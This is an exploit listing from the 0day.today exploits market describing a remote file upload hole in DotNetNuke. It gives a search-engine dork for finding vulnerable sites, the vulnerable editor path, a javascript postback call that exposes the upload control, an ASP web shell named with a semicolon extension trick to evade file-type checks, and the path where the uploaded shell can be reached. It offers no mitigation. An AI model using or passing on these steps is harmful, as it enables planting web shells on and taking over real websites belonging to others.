[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DotNetNuke Remote File upload Vulnerability

Author
ra3ch
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12356
Category
web applications
Date add
22-05-2010
Platform
php
===========================================
DotNetNuke Remote File upload Vulnerability
===========================================


************************************************************
**  Prodcut:        DotNetNuke  
**  Home   :         www.DZ4All.cOm/Cc
**  Vunlerability :    Remote File upload
**  Risk  :        High
**  Dork :         inurl:tabid/176/Default.aspx or inurl:portals/0/
************************************************************
** Discovred by:    Ra3cH & Ma3sTr0-Dz
** From           :    Algeria
** Contact     :     e51@hotmail.fr
** *********************************************************
** Greetz to :     ALLAH
**         All Members of  http://www.DZ4All.cOm/Cc
**          And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & Ma3sTr0-Dz
************************************************************
**  Exploit:
**  http://[PATH]/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
**
**  AnD Add :  javascript:__doPostBack('ctlURL$cmdUpload','')
**
**
**  AnD UpLOaD YoUr ShEll AsP LiKe    Dz4aLL.asp;me.jpg 
************************************************************
**
**  you find your Shell Hier
**
**  http://[PATH]/portals/0/dz4all.asp;me.jpg
*************************************************************



#  0day.today [2024-12-25]  #